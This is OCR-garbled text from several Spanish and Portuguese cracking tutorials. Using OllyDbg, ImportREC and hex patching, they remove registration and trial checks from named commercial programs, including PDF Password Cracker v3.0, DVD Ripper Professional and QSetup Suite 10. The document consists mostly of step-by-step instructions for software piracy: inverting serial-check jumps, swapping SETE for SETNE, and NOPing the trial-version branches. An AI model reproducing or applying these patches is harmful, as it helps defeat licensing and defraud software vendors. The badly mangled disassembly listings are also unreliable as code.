IAT menos la ImageBase), y el Size (es el tamaño de la IAT). 

Ahora hacemos clic en Get Imports y a continuación en Show Invalid, ya que en el log me está avisando de que 
existe una entrada mala en la IAT: 


Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


áttach to an Áctive Process 


[c:tarchivos de programa pdf password cracker v3.Dcrackpdf. exe (OOOODEF8) v | Pick DLL 


Imported Functions Found 
rva:00088444 mod:user32. dll ord:015B name:GetSysColor 
rva:00088448 mod:user32. dll ord.0230 name: SendMessages, 
rva:0008844C mod:user32. dll ord:01DC name:MessageBeep 
rva:00088450 mod:user32. dll ord:02B4 name:UnregisterClassá, 
rva:D00088454 mod:user32. dll ord:0180 name:HideCaret 
rva:00088458 mod:user32.dll ord:028E name:ShowCaret Auto Trace 
rva:0008845C mod:user32.dll ord:00E1 name:ExcludellpdateR gn 
rva:D00088460 mod:user32.dll ord:00B4 name:DrawFocusRect 
rva:00088464 ptr:00145877 Clear Imports 


Show Invalid 


Show Suspect 


Current imports: Clear Log 
E (decimal:12] valid module(s] (added: +C (decimal: +12)) 

1639 (decimal:361] imported function(s). added: +169 (decimal: +361 
[1 [decimal:1] unresolved pointer(s)] ladded: +1 (decimal: +1]] 


147 Infos needed New Import Infos (1ID+45CIl+LOADER] — 


DEP [0006560D lAT AutoSearch l RA [00000000 Size [00001130 
RAYA [00087FFC Size [000005DC Y _Add new section 


Load Tree | Save Tree | Get Imports l Fix Dump [ 


el le BENE 


En la imagen vemos que la entrada mala está en 00088464 así que sumamos la ImageBase y nos da 00488464. Pues 
vayamos a esa dirección en el Dump para poner un HBP: 


id 4 


55: | 


0046560D 


00488464|77 58 14 00 B8 96 E FF 9 
a a DO 3B 7E 22 B2 3A 7E OE 1B 
00488484 |49 98 3A 7E 3E D3 3A 7E 72 DE 
00188494|ur 91 3A 7E C5 77 3A 7E 28 8E 


0D046560E|  8BBEC 
00465610 6A EF 
00465612 68 E8BC48| E a 
00465617 68 4C9D46| Breakpoint Memory, on access SE hand 
D046561C 64:A1 000! Search for »| Memory, on write 
00465622 50 Follow DWORD in Dump > Byte 
00465623 64:8925 0 Findreferences Ctrl+R Primera on srl >| Word 
0046562A 83EC 58 View executable file | 
0046562D 53 Copy to executable fle Hardware, on execution 
0046562E 56 Goto 
0046562F 57 
00465630 8965 Es |vw Hex 
00465633 FF15 3882| Text kernel3 
00465639 33D2 Short 
0046563B BADA Long 
0046563D 8915 58E2|  Float 
00465643 8BC8 Disassemble 
00465645 81E1 FF00| special 
0046564B 890D 54E2 
00465651 Data Ripper 

Extra 

Export table » 

Appearance » 


9 oy: -«0019- 


F6 ES 3A 7E|1D;+"":-00;-0é:- 
B4 90 3A 7E|1":->0:-rb9-*D:- 
2B 8D 39 7E 


O*: Am: + (Z9-+09- 


Damos a F9 y nos sale la ventana para registrarnos y no para así que tendremos que registrarlo para ver cuando usa 
esa dirección. Pues nada, reiniciamos la aplicación de nuevo y volvemos a llegar hasta el OEP verdadero. Lo 
primero que se me ocurre siempre es usar un BP MessageBoxA así que probemos a ponerlo desde la CommandBar 


y voy al lugar donde se puso y lo quito y lo coloco en el RETN de la API. 


Doy a F9 y nos sale la ventanita que nos dice que el serial ese no vale así que aceptamos y... 


7E3D07ED|  8BEC mov ebp, esp 

TE3DO7EF 833D BC143EF7E t cmp dword ptr ds: [7E3F14BC], 0 
TE3DO7F6 |, 74 24 je short 7E3D081C 

TE3DOTE8 | 64:A1 18000000 mov eax, fs: [18] 

TE3DOTFE 6 00 D 

7E3D0800 FF7O 24 dword ptr ds: [eax+24] 
7E3D0803 68 241B3F7E TE3F1B24 

7E3D0808 FF15 C412397E ds: [7E3912C4] 

7E3D080E 8500 eax, eax 

7E3D0810|, 75 O0A short 7E3D081C 

7E3D0812 C705 201B3F7E dword ptr ds:[7E3F1B20], 1 
7E3D081C 6A 00 0 

TE3DO81EÉ FF75 14 

71£E3D0821 FF7?5 10 

7E3D0824 FF?5 0C 

7£E3D0827 FF7?5 08 


7E3D085C 
ebp 


7E3D082A 
7E3D082F 


E8 2D000000 


T7E3D0833 
T7E3D0834 


USER32.7E3D081C 


kernel132.InterlockedComparel 


USER32.7E3D081C 


USER32 .MessageBoxExA 


Vemos como ha parado donde queríamos así que demos a F7 para salir de la API y llegamos aquí: 


00405260! 
00405265| 
00405267 | 
0040526C| 
00405271| 
00405276| 
00405277 | 
00405279| 
0040527F | 
00405284 | 
00405289| 
0040528C| 
)040528E 
00405290 | 
00405292| 
00405297 | 
0040529 | 
0040529D| 
004052A3| 
004052A4| 
004052A6| 
004052AA | 
004052AF | 
004052B4| 
004052B9| 
004052BC | 
004052C6| 
00405208 | 
004052C9| 
004052CF | 
004052D4| 
004052D6 | 
004052D8 | 
004052DD | 
004052DE | 
004052E4 
004052E9 


B9 32000000 mov 
3300 xor 
BF F0B44B00 mov 
68 FOB44B00 push 
68 FBO30000 push 
56 push 
F3:AB rep 


FF15 F8834800 
68 FOB44B00 
E8 7IF9FFFF 


8304 04 add 
85c0 test 
74 ¿ Y ? y 
6A 40 push 
68 24644900  |push 
68 EC694900  |push 
56 push 
FF15 00844800 |call 
51 push 
8Bce mov 
896424 0C mov 
68 F0OB44B00 push 
E8 5A6C0700 

ES F7EBFFFF 

8304 04 add 


C705 B8B54B00 (mov 
6A 01 push 
56 push 
FF15 FC834800 
E9 8F020000 


6A 10 push 
64 00 push 
68 A4694900 push 
56 push 


FF15 00844800 


68 FBO30000 4 Ss! 


56 ush 
FF15 04844800 pre 


ecx, 32 

eax, eax 

edi, 4BB4F0 
4BB4F0O 

3FB 

esi 

stos dword ptr es: [edi] 
ds: [4883F8] 
4BB4FO 
00404C00 

esp, 4 

eax, eax 
short 004052D4 


ASCIT "98989898" 
ASCIT "98989898" 


USER32.GetD1gItemTextA 
ASCII "98989898" 
crackpdf .00404C00 


40 

49624 
4969EC 

esi 

ds: [488400] 
ecx 

ecx, esp 


4BB4FO 
0047BFOE 
00404EB0 
esp, 4 
dword ptr ds: [4BB5B8], 
1 

esi 

ds: [4883FC] 
00405563 
10 

D 

496954 

esi 

ds: [488400] 
FB 

esi 

ds: [488404] 


1 


ASCIT "Thank you." 
ASCIT "Thanks for purchasin: 


USER32 .MessageBoxA 


ASCIT "98989898" 
crackpdf .0047BFOE 
crackpdf .00404EB0 


USER32.EndDialog 


crackpdf .00405563 


ASCIT "Your registration ke 


USER32 .MessageBoxA 


USER32.GetD1gItem 


Jojojo, vemos el MessageBox del chico malo y también el del chico bueno y justo encima del mensaje de chico 
bueno hay un salto condicional que si se cumple nos tira a la zona del chico malo y un poquito mas arriba hay una 
CALL que es la encargada de verificar el serial casi seguro así que pongamos un BP en esa CALL y demos a F9 
para continuar y acto seguido intentamos registrarnos de nuevo para que pare en dicha CALL: 


00405260! 68 FOB44B00 
00405271 68 FB030000 
00405276| 56 
00405277| F3:AB 
00405279! FF15 F8834800 
0040527F|' 68 FOB44B00 
1 E TTFOFFFF 
00405289| 8304 04 
0040528C| 85c0 


0040528E|, 74 44 
00405290| 6A 40 
00405292. 68 24644900 


00405297 68 EC694900 
0040529 56 


4BB4F0O 
push 3FB 
push esi 


rep stos dword ptr es: [edi] 
call ds: [1883F8] 


ABB4FO 
D0404C00 


test eax, eax 
short 004052D4 

push 40 

push 496524 

push 4969EC 


push esi 


ASCII "98989898" 


USER32.GetD1gItemTextA 
ASCII "98989898" 


crackpdf .004052D4 


ASCII "Thank you." 
ASCII "Thanks for purchasini 


Una vez que pare en la CALL, damos a F7 y llegamos aquí: 


' 83 


8309 FF 
3300 


00404C03| 
00404C06 
00404008 
00404009 


00404C0A| 8B7424 24 
00404C0E 57 push edi 
00404C0F|  8BFE mov edi, esi 
00404C11| F2:AE repne scas byte ptr es: [edi] 
00404013 F3D1 not ecx 
00404C15| 49 deco ecx 
00404C16 83F9 14 cmp ecx, 14 

, 74 07 je short 00404022 
0O0404C1B|  5E pop edi 
00404C1C| 5E pop esi 
00404C1D 5B pop ebx 
00404C1E 8304 18 add esp, 18 
00404021 c3 retn 
00404C22| 8A46 OE mov al, ds: [esi+El 
00404025 8A4E OF mov cl, ds: [esi+F 
00404C28| 8D5424 0C lea edx, AT 
00404C2C 32DB xor bl, bl 
00404C2E| 52 push edx 


Si vamos traceando veremos que lo que hace es contar el largo de nuestro serial y justo antes del salto lo compara 
con 14 hexadecimal y como no es igual pues no saltara y nos sacara de la CALL y EAX valdrá O con lo cual nos 
llevará a la zona de chico malo así que tendremos que hacerlo saltar siempre: 


00404C0F|  8BFE 
00404C11| F2:AE 
00404C13| F7D1 
D0404C15| 49 
00404C16 83F9 14 


mov edi, esi 

repne scas byte ptr es: [edi] 
not ecx 

ecx 

ecx, 14 


D04D4C22 


00404C1B| | edi 

DO404Cc1ic SE pop esi 

00404C1D '5B pop ebx 

00404C1E| | 83ca 18 add esp, 18 
o0s04c21| |c3 retn 

00404C0C22| 18A46 OE mov al, ds: [esi+E] 
00404025 BA4E OF mov cl, ds: [esi+F] 
00404028 8D5424 0C lea edx, 


32DB 


00404C2C| xor b1, bl 


00404coF | 8BFE mov edi, esi 


00404C11 F2:AE repne scas byte ptr es: [edi] 
00404013 F73D1 not ecx 

00404C15 49 dec ecx 

00404C16 83F9 14 cmp ecx, 14 


00404C1B| | 5F pop edi 


D0O1404c1iC 5E pop esi 
00404C1D 5B pop ebx 
D0404C1E 8304 18 add esp, 18 


00404C21 


00404C22| *8A46 OE mov al, ds: [esi+E] 


00404C25| 8A4E OF mov cl, ds: [esi+F] 
00404028 8D5424 0C lea edx, 
00404C2C| 32DB xor b1, bl 


Seguimos traceando y llegamos a otro salto y si nos fijamos si no se cumple el salto xoreara a EAX contra si misma 
así que la pondrá a O y eso no nos interesa así que tiene que saltar aquí también siempre: 


00404044 8BF8 
00404046 8D4424 1C 
00404C4A 50 

00404C4B E8 60090600 
00404050 03F8 
00404052 8304 08 
00404055 83FF 0B 


mov edi, eax 


lea eax, SSi[espricl 


ush eax 
ca 004655B0 


add edi, eax 
add esp, 9 
edi, 0B 


00404C5A 5F edi 
00404C5B 5E pop esi 
DO4DA4C5C 33C0 xor eax, eax 
0D0404C5E 5B pop ebx 
0D0404C5F 8304 18 add esp, 18 
00404C62| | C3 retn 

00404C63| *+8A0E mov cl, ds: [esi] 
00404065 8A56 01 mov dl, ds: [esi+1] 
00404068 8D4424 0C lea eax, 
00404044 8BF8 mov edi, eax 
00404046 8D4424 1C lea eax, 
00404C4A 50 ush eax 

00404C4B E8 60090600 pe 004655B0 
00404050 03F8 add edi, eax 
00404052 8304 08 add esp, 8 
00404055 83FF 0B edi, 0B 


00404C05A edi 


00404C5B 5E esi 
00404050 33C0 eax, eax 
00404C5E 5B ebx 
00404C5F 8304 18 esp, 18 


00404062 Cc3 
00404063 BADE 
00404C65 8A56 01 
00404C68 8D4424 0C 


cl, ds: [esi] 
dl, ds: [esi+1] 
eax, 


Seguimos traceando y vemos que la historia se repite de nuevo así que aquí también tendrá que saltar siempre: 


00404C86 
00404C88 
00404C89 
00404C8E 
00404C90 
00404C93 


8BF8 
51 
E8 22090600 
03F8 
8304 08 
83FF 0A 


5F 

5E 

3300 

5B 

8304 18 


00404C98 
00404099 
00404C9A 
00404C9€ 
00404C9D 
D0404CA0 
0D0404CA1 


00404CA7 
00404CA8 


00404086 
00404C88 
00404C89 
00404C8E 


E8 22090600 
03F8 


00404090 8304 08 add 
00404C93 83FF 0A cmp 
EB. nc Fm 


00404098 
00404099 
00404C9A 
00404C9€ 
00404C9D 
D0404CA0 
D0404CA1 


5F 
5E 
3300 
5B 


8304 18 


00404CA7 


00404CA8 


00404098 
00404099 
00404C9A 
00404C9C 
00404C9D 
D0404CA0D 
D0404CA1 


00404CA7 
00404CA8 
00404CA9 
00404CAB 
00404CAC 
00404CAF 
anñnanaran 


edi, eax 
ecx 
004655B0 
edi, eax 
esp, 3 
edi, 0A 


short 00404CA1 
edi 

esi 

eax, eax 

ebx 

esp, 18 


byte ptr ds: [esi+5], 33 
short 00404CB0 

edi 

esi 


edi, eax 
ecx 
004655B0 
edi, eax 
esp, % 
edi, 0A 
short 00404CA1 
edi 

esi 

eax, eax 

ebx 

esp, 18 


byte ptr ds: [esi+5], 33 
short 00404CB0 

edi 

esi 


edi, 0A 

short 00404CA1 
edi 

esi 

eax, eax 

ebx 

esp, 18 


33 


ptr ds: [esi+5], 
- 0041 


404CB0 
edi 

esi 

eax, eax 

ebx 

esp, 18 


1. de: frei4T71 


Seguimos traceando y llegamos a un SETE AL y poco después un RETN. Vemos que la condición no se cumple, 
con lo cual EAX seguirá siendo O así que sustituyamos el SETE por SETNE para hacer que se cumpla: 


00404CDO 
00404CDA| 
ODADACDE | 
00404CD7| 
DO4DACDC 
00404CDF | 
00404CE1 
D0404CE3| 
ODA4DACE6 
00404CE7!| 


O0404CEB | 
DOADACEC 
00404CEF 
OO404CF0| 
00404CF3| 


00404CDO 
D0404CD4 
0D0404CD6 
00404CD7| 
00404CDC' 
00404CDF | 
D0404CE1| 
00404CE3| 
00404CE6 
00404CE7| 


00404CEB! 
D04DACEC 
00404CEF 
O04DACFO 
00404CF3| 


00404CE8f 


8D5424 1C lea edx, ss: [esp+1C] 
8BFO mov esi, eax 
52 push edx 
ES D4080600  |call 004655B0 
8304 08 add esp, 8 
03F0 add esi, eax 
3300 xor eax, eax 
B83FE OF cmp esi, 0F 
5F pop edi 
esi 


E 


8304 18 add esp, 18 

c3 retn 

83EC 28 sub esp, 28 

53 push ebx 

8D5424 1C lea edx, ss: [esp+1C] 

8BF0O mov esi, eax 

52 push edx 

E8 D4080600 ¡fall 004655B0 

8304 08 add esp, 8 

0O3F0O add esi, eax 

3300 xor eax, eax 

83FE OF cmp esi, 0F 

5F pop edi 
pop esi 

95 setne as 

pop ebx 

8304 18 add esp, 18 

c3 retn 

83EC 28 sub esp, 28 

53 push ebx 


Seguimos traceando y salimos de la CALL y vemos como el salto no se cumple y nos aparece la ventana de chico 


bueno: 


. 
JJ) Thanks for purchasing the PDF Password Cracker v3,0, 


Ahora es el momento de ver cuando para en la entrada mala de la IAT así que, como tenemos un HBP puesto para 
que pare en cuanto intente hacer algo con ese valor, pues aceptemos la ventanita de chico bueno y demos a F9: 


o Disassembly Comment 
h E r aC end El 


00145877 NM 04 — [push o erackpdf.004BB4 
0014587B| E8 ABFEFFEF  0014572B 

00145880 - FF25 CC281500 ds: [1528CC] USER32.TranslateMessage 
00145886 55 push ebp 

00145887 8BEC mov ebp, esp 

00145889 81EC 20020000 sub esp, 22€ 

0014588F 53 push ebx 

00145890| 57 push edi 

00145891| 6A 00 push D 

00145893 6A 02 push 2 

00145895| 32DB xor b1, b1 

00145897 C785 DAFDFFFF ¿mov dsrord ptr ss: [ebp-220], 220 

001458A1. FF15 EC2B1500 call ds: [152BEC] kernel132.CreateToolhelp32Sn. 
00145847 8BF8 mov edi, eax 

00145849! 8D85 DAFDFFFF 'lea eax, 

0014584EF | 50 push eax 

001458B0 57 push edi 

001458B1| FF15 FO2B1500 ¡call  ds:[152BF0] kernel32.Process32FirstW 
001458B7 8500 test eax, eax 

001458B9|, 74 4E je short 00145909 

001458BB| 56 push esi 

tack 881: [UDISFPLEL J=16004E5459 [crackpdr . UBB 4SO 


Address [Hex dump ASCII 


00488464177 58 14 00 B83 96 39 7E FF 97 3A 7E|9C 8F 39 7E|WMXD: ,-9-y—:- «09 
00483474 |6c DO 3B 7E|22 B2 3A 7E OE 1B 3B 7E F6 E8 3A 7E|1D;-"*":-D0;-0€: 
00488484|49 98 3A 7E 3E D3 3A 7E 72 DE 39 7E B4 90 3A 7E|1” :+>0:+-rb9-"D: 


Vemos que esta vez si que paro y que fue desde una CALL, la cual es indirecta ya que no apareció al hacer una 
búsqueda de referencias. 


Pues yo diría que esa API es TranslateMessage así que ya tenemos todo lo que necesitamos para intentar sacar 
nuestro dumpeado. 

Reiniciamos de nuevo la aplicación en olly y volvemos a parar en el OEP verdadero y esta vez cambiaremos todos 
los saltos y el SETE y lo dumpeamos. 

Acto seguido hacemos igual que antes con Import Rec y nos colocamos encima de la entrada mala y hacemos doble 
clic encima y nos mostrara una ventana como esta: 


IMPORT EDITOR 


Module 
user32. dll 


Function 


ord:0245 name: TrackPopupMenu 
ord:0246 name: TrackPopupMenuE x 
ord:0247 name: Translateó,ccelerator 
ord:0248 name: Translateóá.cceleratorá, 
ord:0249 name: Translateácceleratory' 
ord:0244 name: TranslateMDISys4ccel 


ord:024B name: TranslateMessage 


ord:024C name: TranslateMessageE x 
ord:024D name:Unhookw'inE vent 
ord:024E£ name:Unhookw'indowsHook 
ord:024F name:Unhook'wW'indowsHookE x 
ord:0280 name:UnionRect 

ord:0281 name:UnloadKeyboardL ayout 


Name [TranslateMessage 


RAYA, 


[00088464 [ i Cancel 


Buscamos la API TranslateMessage y damos a OK: 


$ Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


Attach to an Active Process 
c4archiwos de programatpdf password cracker v3.Ocrackpdf. exe [(OODODEF8] y Pick DLL 


Imported Functions Found 
rva:D00088444 mod:user32. dll ord:0158 name:GetSysColor Show Invalid 
rva:D0088448 mod:user32. dll ord:0230 name: SendMessages, 
rva:0008844C mod:user32. dll ord:01DC name: MessageBeep Show Suspect 
rva:00088450 mod:user32. dll ord:02B4 name:UnregisterClassá, 
rva:D00088454 mod:user32. dll ord:0180 name:HideCaret 
rya:D00088458 mod:user32. dll ord:028E name:ShowCaret Auto Trace 
rva:0008845C mod:user32.dll ord:00E1 name:ExcludellpdateR gn 
rya:D00088460 mod:user32.dll ord:00B4 name:DrawFocusRect 
rva:00088464 mod:user32. dll ord.024B name: TranslateMessage Clear Imports 


[0 (decimal: 0) unresolved pointer(s)] (added: -1 (decimal: -1)] 


Congratulations! There is no more invalid pointer, now the question is: Will it work? :-) 
Clear Log 


Current imports: 
D [decimal:13)] valid module(s 
1639 [decimal:361] imported function(s). 


lAT Infos needed New Import Infos (IID+4SCI+LOADER) — Options 


DEP [00065600 147 AutoSearch l AA, [00000000 Size [00001 A18 
RAYA [00087FFC Size [o00005Dc IY Add new section 


Load Tree Save Tree | Get Imports | Fix Dump l 


Bh E pol: 


Como vemos quedo reparada y nos indica que ya no hay más entradas malas así que damos en Fix Dump y 
elegimos el dumpeado que acabamos de crear y ya tendremos nuestro ejecutable con la IAT reparada. 
Ahora toca ver si funciona así que hacemos doble clic en el y... 


——_ Mr £ 34 - 
PDF Password Cracker v3.0 


Piesult o Event Source Document 


«ER E0_z_ os 2 


¡Funciona! Y no solo eso, sino que los mismos saltos que cambiamos son los responsables de comprobar el registro 
al iniciarse la aplicación, así que al cambiar los saltos conseguimos hacerle creer que estamos registrados. 


Bueno, lo he probado y todo va perfecto y sin limitaciones ni nada así que objetivo cumplido jejeje. 


Esto es todo y espero que os haya gustado. 


Hola a toda la lista! Este es el tercer tuto de la serie Parchando a lo Loco y creo que con este ya 


está. Aunque soy medio chifladito y por ahí escriba algún otro de esta serie. Ademas las 
“vacaciones” por la Gripe A ya terminaron y voy a estar muy ocupado con la facultad, pero 
bueno en algún momento algún otro tuto voy a escribir, todo sea por devolver a la lista algo de 
todo lo que me dio con sus tutos. 


Bueno basta de tanta palabrería y vamos a trabajar(¿) un poco. Instalamos la víctima y luego 
pasándola por RDG Packer Detector: 


RDGiPacker Detector vO.6.5 -)x) 


CaATrialesiPlato DWD Ripper Professional dvdripper_pro.exe Abrir 


Microsoft Visual C++ 6.0 Compilador 


Molebox v2.3.x Detectado 


Check IsDebuggerPresent A 
Al Frente [] 


ByE Detectar)» ] 


Y Archivo Escaneado en 6,235eg. O MA € 


Contacto : www.molebox.com 


Ops...Molebox...Ya dije que recién doy mis primeros pasos en el unpacking...y no se bien como 
funciona Molebox pero lo cierto es que si escribo este tuto es porque no necesite 
desempacarlo; Peid y Exeinfo PE no me detectaban ningún packer... 

Vemos que tiene una protección antidebugging: “Check IsDebuggerPresent”, si miramos el 
ejecutable cargado en Olly: 


ii id apra A AT NN NI 
: 


«rdat Impo: USER32. 1 


Hay varios plugins que solucionan el problema, entre ellos uno con el mismo nombre 
“IsDebuggerPresent”. 
Antes de seguir ejecutemos el programa y veamos que se trae...Si pinchamos el botón a la 


izquierda minimizar 2 nos da una opción para registrarnos, si la elegimos nos 


aparece una ventana y si ingresamos un nombre y un serial nos dice: 


Register... 


IF you have! a license code, click it to buy = Bi 


1.Paste your license Sorry E) 


Biohazard 

e 

1.) Invalid license name or license code 
2.Paste your license 


292929292929 ar 


oK Cancel 


Si cargamos algún DVD e intentamos ripear a algún formato ni bien le damos a START nos 


avisa: 


* You could only convert 15 minutes of the movie in trial version ! 
Please register this copy to get Full function 


OK 


Jeje solo 15 minutos! Dejáme por lo menos convertir una peli completa por lo menos! Rata... 
Carguemos el programa en Olly (con el plugin para evitar IsDebuggerPresent).Acá empieza: 


Pero como vamos a proceder? Podríamos buscar e invertir el salto que decide si vamos a la 
zona de chico malo o chico bueno para que registre con cualquier user/name y fue!...pero soy 
fiaca y ni siquiera quiero poner un serial luego de crackearlo, además es muy probable que si 
cambiamos ese salto tengamos que registrarlo cada vez que lo volvamos a usar (Tarea para 
ustedes...busquen el salto clave buscando la string Invalid license name or license code e 
inviertánlo, guarden los cambios,regístrenlo, ciérrenlo y vuelvan abrirlo y vean que pasa...es 
fácil. háganlo no sean fiacas...je je justo yo lo digo). 

A ver...busquemos en la lista de strings (Botón derecho y luego SEARCH FOR/ALL REFERENCED 
TEXT STRINGS) alguna palabra de ese mensaje que nos decía que solo podíamos ripear 15 
minutos. Por ejemplo busquemos “you could” (Botón derecho y luego SEARCH FOR/ALL 
REFERENCED TEXT STRINGS): 


[You could y | 


[Case sensitive 


Entire scope 


Cancel | 


Y encontramos el tonto mensaje: 


Hagamos Follow (apretando ENTER) para verlo: 


Hay vemos un JNZ y un JL ambos si se producen nos llevan a la misma posición evitando el 
tonto mensaje. Pongamos un BP en JNZ, Run o F9, carguemos algún DVD y vemos que para: 


Cambiemos el estado del flag Z para que salte a ver qué pasa. Nos situamos en dicho flag y con 
un doble click cambiamos el estado del este a O para que el JNZ se produzca: 


Run o F9 y vemos que el mensaje no aparece y comienza a ripear; yo lo deje y termino con 
todo el DVD que había cargado. Funcionó. 

Volvamos al JNZ en el que pusimos el BP y cambiémoslo por un JMP (Click con el botón 
derecho y ASSEMBLE): 

ANTES: 


INZSHORT ODA 


[4 Fill with NOP's 


Cancel 


DESPUÉS: 


e" 


Assemble at 004772E7 


JMP|0047731B v 


IV Fill with NOP's 


Cancel 


Guardemos los cambios en el ejecutable. Click con el botón derecho COPY TO EXECUTABLE/ALL 
MODIFICATIONS luego COPY ALL y en la nueva ventana que se abre Click con el botón derecho 
de nuevo y SAVE FILE. Ojo! A diferencia de los programas de “Parchando a lo Loco Gif Movie 
Gear y Atomix Mp3” este,si bien pueden guardarlo con otro nombre (dvdripper_pro2.exe por 
ejemplo) ¡deben hacerlo en el directorio de instalación si no no arranca. Se pone a buscar .dll y 
no las encuentra.... 

Bueno guardemos, ejecutemos, carguemos un DVD y veamos si anda: 


PIAZO DVD Ripper Professional 


Trial Version 7,88,18 


OS) [puesto_184_] 
Y MPEG Domain: 
TITLE 
dl ¡Pod Position: 
Title: 01/01 Chapter: 01/12 
iPhone 
Video: 
Y Portable 720x480 60Hz 16:9 
Audio: 
1) Youtube Flv Inglés (Estados Unidos), AC3 
WD pspPs3 Subtitle: 
Español - España (alfabetizació 
o Ml Black Berry Status: 
Conwerting 
Q ww From 0:01:07 To 2:18:09 
Finished: 0:00:10 [0.1%] 
MM microsoft Zune 
o 0:01:17/2:18:09 
UD Pocket PC 
a 2 UU EM «Kni«»» y ———_—az 
X Mobile 3GP 2 
82 Real Media Output Folder: C:platodvdripperl Browse... 
ED Audio Output Profile: Sony PSP MPEG4 320x240 768kbps; Audio: Stereo/128kbps; y SN 
Saving to M4Y410010,MP4 do 


Si anda...justo saque la impresión de pantalla en una parte de la película en la que no había 
imagen...jeje,pero anda y eso es lo importante; pero no me gusta algo, ese “Trial Versión” 
arriba a la derecha. Carguemos el ejecutable modificado que guardamos hoy y busquemoslo 
en la lista de strings pero marcando Case Sensitive (supongo que en varios lado aparecerá trial 
o versión por eso me aseguro) y escribámoslo tal cual aparece. 


Enter text to search for 


Trial Wersiorl 


[Y Case sensitive 


Entire scope 


Cancel | 


Olly para acá: 
BB4755SF| PUSH 04958485 ASCII "Version Hs" 


bRdrErfB2| PUSH 664953 AC ASCII "quest ion" 
Como ven puse un BP. 


Con Ctrl + L buscamos el siguiente que en realidad es la última vez que para: 


B64FADAC| PUSH BB49720C ASCII "Lers ion ss" 


b64rAD6E| PUSH BaB4ar2FC ASCII "Free Version 4” 
También le puse un BP. 


Run o F9 y veamos donde para primero: 


833D_3849A4B01 CMP DWORD PTR_DS: [4694384], 5 


75 6A JNZ SHORT 6047AD67 
asi CMP DWORD PTR_DS: [4B9674], 1 
Ai 9CAD4B808 MOV EAX, DWORD PTR DS: [4BAD9CI 
50 PUSH EAX 


Ara3 => BOBFC67B8 ASCII ”?.88.18” 
68 DC724900 | PUSH _BB4972DC Ara2 = BB4972DC ASCII "Version Xs” 
38D4D Fa LEA ECX, DWORD PTR SS: [EBP-10] 
51 PUSH ECX Argi. 
ES C66SFSFF | CALL duvdrippe.004015E0 
38304 BC ADD ES 


P,Bc 
LEA ECX, DWORD PTR SS: [EBP-10] 


CALL 

PUSH_EAX 

MOU ECX, DWORD PTR SS: [EBP-14] 
8101 98C10101 ADD ECx, 1195 

ES 90B9F9FF | CALL 


EB 2F JMP 
3B15 2CAD4B0! MOV EDX, DWORD PTR DS: [4BADICI 
52 PUSH_EDX 


3D4D FO 
= DB72FSFF 


A 


LEA EAX, DWORD PTR SS: [EBP-10] 
PUSH EAX 


50 Aral 
ES 9568FSFF dudrippe. 064015E0 
8304 BC 


CALL 

ADD ESP, 6c 

3D4D FO LEA ECX, DWORD PTR SS: [EBP-10] 
ES RAT2FSFF | CALL 
50 PUSH_EAX 

3B4D EC MOU ECX, DWORD PTR SS: [EBP-14] 
8101 98C16161 ADD ECX, 101983 

ES SFB9F9FF | CALL 


EB 2F JMP 

3B0D 9CAD4B01 MOV ECX, DWORD PTR DS: [4BAD9CI 
51 PUSH ECX 

68 FC724900 
38D55 FO 


ras => BBFC67BS ASCII ”?.88.18” 
Mraz = MB4972FC ASCII "Free Version %s” 


PUSH_BB4972FC 

LEA EDX, DWORD PTR SS: [EBP-10] 
52 PUSH EDX 

ES 6468FSFF (CA 
8304 BC 


Aral 
LL dudr ippe. 004815E0 
ADD ESP, ac ___ 


Ahí vemos las tres posibilidades que nos podría mostrar en la esquina superior derecha: 


»_n 


“Version”,” Trial Version” y “Free Versión”. Sé que la Trial no es la que quiero pero de las otras 
dos con cual me quedo ? Si alguno hizo la tareita que deje más arriba(la de parchar para 


registrar con cualquier nombre y serial) verán que cuando registran con cualquier nombre 
arriba se pone “Version 7.88.18” haci que supongo que será la primera opción la que debe 
mostrar al registrar correctamente. Quienes deciden el texto a mostrar son los 2 JNZ en la 
parte superior de la imagen: el primero nos manda a “Free Version”, el segundo a “Trial 
Version” y si no se producen ninguna de las 2 me muestra “Version”. Seleccionemos desde el 


primer JNZ hasta el último hací: 


Y nopemos: Click con el botón derecho BINARY/FILL WITH NOPs. Guardamos los cambios en 


ejecutable (ya saben cómo hacerlo) y lo probamos: 


PIAZO DVD Ripper Professional Version 7.88.18 
"ON, [puesto_184_] 
y MPEG Domain: 
TITLE 
de Pod Position: 
e Title: 01/01 Chapter: 01/12 
Video; 
% Portable 720x480 60Hz 16:9 
Audio: 
D) Youtube Fiv Inglés (Estados Unidos), AC3 
UD pPsprs3 Subtitle: 
Español - España (alfabetización 
0 Black Berry Status: 


Paused 


VYMV 


0:00:20/2:18:09 


o 

a Microsoft Zune 
ocket PC | 

MD. Pocal ER a >» n 4» | a» o Y —_—————————a 

X 


Mobile 3GP 


BA Real Media Output Folder; C:jplatodvdripper Browse... 


Bueno...anda y ahora si me gusta como quedó. 

Saludos a toda la lista...espero que los 3 tutes hayan sido de utilidad, en especial a quienes 
recién comienzan, como yo; quizás cuando avance un poco más vuelva a utilizar los mismos 3 
programas de estos tutes para hallar su serial y no parcharlo, pero bueno ya veo que hago. 


BIO0DAZA'D 


Tutorial de como Pescar Serial para QSetup Suite 10 


Alvo: QSetup Installation Suite 10 
Ferramentas: OllyDbg 

Objetivo: Pescar Serial 

Cracker: unn4m3D_BR 


Por muito tempo fiquei sem escrever nada, hoje estou escrevendo um 
tutorial de como pescar serial para o QSetup Onstallation Suite 10 
espero que gostem. O 


[ Introducáo! ] 


QSetup Installation Suite é um programa de instalacáo efetivo 
para os setups mais sofisticados. Com uma interface intuitiva, 
possibilita a criacáo de instalacdes sólidas num breve período de 
tempo. E excelente: ele cria um auto-executável que pode ser 
baixado da Internet, distribuido em CD ou em um servidor de 
arquivos. QSetup é um programa 32-bit Windows. 


[ Analisando o Software ] 


Podemos ver que está compactado com UPX, como iremos pescar 
serial, náo precisamos descompacta-lo. 


| PE PEIiD y0.94 


File: [C:jArquivos de programasiPantaray|QSetup|Composer.ex En | 
Entrypoint: — [002FCD50. EPSectiom: [UPxX1 [ES 
File Offset; [000E7150  FirstBytes: [60,BE,00,60 >] 
Linker Info: [2,25 Subsystem:  [Win32 GUI [Ea 


UPX 0,89,6 - 1.02 / 1,05 - 1,24 -> Markus 8: Laszlo 
Multi Scan Task Viewer Extra Info => 


[Y Stay on top Options | About Exit 
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Tutorial de como Pescar Serial para QSetup Suite 10 


Vemos aqui no programa que na parte de about encontramos nossa 
telinha de registro notificando versáo Demo. 


Testando qualquer serial, achamos nossa mensagem o que já é 
suficiente para comecar-mos a entender a rotina e montar o nosso 
